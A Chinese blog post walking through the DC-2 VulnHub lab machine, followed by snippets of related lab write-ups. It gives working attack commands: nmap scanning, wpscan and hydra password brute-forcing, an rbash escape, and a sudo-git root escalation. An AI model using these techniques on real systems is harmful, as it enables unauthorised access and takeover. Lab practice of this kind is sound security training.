网络安全之DC-2靶机渗透测试实战

最新推荐文章于 2025-03-12 23:12:10 发布
最新推荐文章于 2025-03-12 23:12:10 发布
阅读量433 收藏 8
点赞数 4
分类专栏: linux 网络安全 kali渗透测试 文章标签: web安全 安全
DoubleJing
本文链接:https://blog.youkuaiyun.com/qq_41944882/article/details/141882626
版权

一、靶机环境搭建

1.下载DC-2虚拟机镜像文件,解压后用VM打开。

DC-2镜像,若链接失效,关注公众号 文化仁 回复DC-2获取,或联系我获取https://pan.baidu.com/s/1gVVdEbiTkFUEOpewsn1iRg?pwd=2t1j
在这里插入图片描述
2.设置DC-2虚拟机的网络适配器为NAT模式,并查看其MAC硬件地址,重启后生效。
在这里插入图片描述
3.开启kali虚拟机
在这里插入图片描述
二、渗透前的信息收集
1.在kali系统中使用nmap工具扫描本网段的机器。

# nmap -sP 192.168.2.0/24**

在这里插入图片描述
根据扫描结果比对MAC地址可知DC-2获取到的IP地址为192.168.2.9。

2.根据IP地址对其进一步收集信息,使用nmap工具扫描其开放的端口以及开放的服务。

# nmap -A 192.168.2.9 -p 1-65535 -oN nmap.A

在这里插入图片描述
根据扫描结果可知,开放80、7744端口,尝试访问其IP,发现连接失败
在这里插入图片描述
3.添加一条本地DNS,使DC-2可以被解析为IP。

# vi /etc/hosts

在这里插入图片描述

在这里插入图片描述
再次访问
在这里插入图片描述
三、正式进行渗透
FLAG1
在这里插入图片描述
在这里插入图片描述
根据提示,使用cewl工具

# cewl dc-2 > pwd.dic

扫描一下网站目录,使用MSF进行网站目录扫描

# msfconsole

在这里插入图片描述

msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(scanner/http/dir_scanner) > options

在这里插入图片描述
根据选项提示,设置RHOSTS目标机器IP地址

msf6 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.2.9rhostsmsf6 auxiliary(scanner/http/dir_scanner) > set threads 50threads => 50

在这里插入图片描述

msf6 auxiliary(scanner/http/dir_scanner) > exploit

在这里插入图片描述
使用wpscan漏洞扫描工具,更新wpscan

# wpscan --update

在这里插入图片描述
注:如果wpscan无法使用,可以尝试更换新的kali 虚拟机,安装 kali 2024.2 之后,wpscan启动成功。

# wpscan --url dc-2 -e u

在这里插入图片描述
wpscan 爆破用户

# wpscan --url dc-2 -U user.dic -P pwd.dic

在这里插入图片描述
FLAG2

访问192.168.2.9/wp-admin,使用jerry用户并用我们爆破出来的密码尝试登录。
在这里插入图片描述
在这里插入图片描述
找到flag2
在这里插入图片描述
在这里插入图片描述
根据提示我们需要另辟蹊径,想到刚开始使用nmap 扫描时,还扫出了ssh 端口7744。

利用hydra爆破ssh

# hydra -L user.dic -P pwd.dic ssh:**//192.168.2.9 -s 7744 -o hydra.ssh -vV**

查看结果:
在这里插入图片描述
尝试使用ssh 登录

ssh tom@192.168.2.9 -p 7744

查看当前目录文件

lscat flag3.txt

发现有rbash 命令限制
在这里插入图片描述
FLAG3
绕过限制

BASH_CMDS[a]=/bin/sh;a/bin/bashexport PATH=$PATH:/bin/export PATH=$PATH:/usr/bin

在这里插入图片描述
FLAG4

切换jerry用户

su - jerry

在这里插入图片描述
进入到jerry用户的家目录
在这里插入图片描述
执行命令,发现没有权限

FINAL-FLAG

提权,查看具有root权限的命令

sudo -l

发现git命令具有root权限,但是不需要提供给root密码。
在这里插入图片描述
git提权

sudo git -p --help

强制进入交互式状态,让页面缓冲区无法显示全部信息。

!/bin/bash

在这里插入图片描述

Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4957
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
DC系列之DC-2渗透测试
qq_45392044的博客
12-24 1158
其实正常情况下来讲,打开浏览器我们输入IP地址的时候,实际上地址栏不应该直接跳到dc-2,如果想正确的访问dc-2这样一个web应用,需要给一个本地的解析,否则访问不了!除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下kali虚拟机的host文件。我们可能在渗透测试或者是攻防演练的过程中,我们需要做一个信息收集,我们往往很多的信息都是放在我们网页里面的。写的,它是WordPress模板,WordPress是我们开源的cms的PHP编写的。
DC-2靶机实战 渗透测试
她叫常玉莹
07-20 764
DC-2主机发现 信息搜集Flag1Flag2Flag3Flag4Final-flag 主机发现 信息搜集 nmap主机发现 我们的靶机地址是:192.168.0.131 nmap扫描 nmap -A -T4 -p- 192.168.0.131 80端口跑着http 7744端口跑着ssh Flag1 访问下80 无法访问这里修改下hosts文件 linux中hosts文件位置 /etc/hosts 这回可以正常访问了,这里有个重定向直接跳转dc-2 在主页中找到找到了flag1 flag1中
docker 网络安全靶机
最新发布
2401_88752684的博客
03-12 976
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)网络安全产业就像一个江湖,各色人等聚集。
网络安全渗透测试实战-DC-3-靶机入侵
DoubleJing的博客
08-27 1262
2)但是目标主机处于内网环境是不可以被外网直接访问,只能主动将shell反弹出来.这种方式称作反弹shell,反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端,本质上是网络概念的客户端与服务端的角色反转。Web指纹定义:Web指纹是一种对目标网站的识别技术,通过识别网站所使用的服务器、运行的脚本、安装的CMS等信息对目标进行精准的分类和定位。获取本网段的主机信息,根据MAC地址比对来获取DC-3的IP地址。
DC-2靶机
m0_62094846的博客
01-29 3506
前面做法和DC-1差不多,信息收集 ifconfig nmap 192.168.61.0/24 输入IP后会跳转域名,但是无法访问页面 发现问题是本地无法解析域名dc-2(看的别人的解释) 要配置可以解析的文件 在命令行中输入 vim /etc/hosts (修改配置文件需要root权限) 要在虚拟机中输入IP才可以,因为文件是在虚拟机配置的 flag1: 提示爆破字典只需要cewl产生的字典即可,并且可能可以爆破出两个不同的账号,可能一个无效 ...
064 渗透测试实战靶机 DC-2
鸡蛋炒鸡蛋
04-23 1085
文章目录一:环境准备二:flag1三:flag2四:flag3五:flag4六:flag5 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战靶机 DC-1 打开DC-2 打开Kali nmap 扫描局域网主机 nmap -sP 192.168.100.0/24 -oN nmap.sP 确定主机之后,对主机进行端口扫描: nmap -A 192.168.100.8 -p 1-65535 -oN nmap.A 发现开放了80和7744端口号。 开放了80端口号,所以这时候
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3227
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
【靶场实战dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1352
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2675
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1438
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
DC-2靶机的渗透学习
里丘~班诺的小屋
09-01 1888
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
DC2-靶机
Au
08-19 1828
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
DC-2 靶机
weixin_63492470的博客
03-11 5543
DC-2靶机下载地址: DC-2 | Five86 | DC Challenges 环境:DC-2靶机地址:192.168.1.139 nmap -sP 192.168.1.0/24 查看ip nmap -A 192.168.1.139 #这里我的靶机IP是132 dirb 192.168.1.139 爆破目录 这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、 然后访问192.168.1.139发现是这个界面,什么也没有看到..
靶机DC-2
weixin_43940853的博客
11-18 251
目标靶机 : 192.168.230.228 kali : 192.168.230.226 发现是wordpress,考虑wpscan 点击flag,根据提示,需要用到cewl 简单的讲,这个工具是利用页面爬取深度生成字典的一个工具 wpscan -u http://dc-2 -eu -et -ep 利用wpscan扫一下用户名(一开始我以为用户名和密码都能扫出来,-ep还以为是passwo...
靶机 DC-2
m0_66299232的博客
09-13 1101
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2056
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

DataGiant

您的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值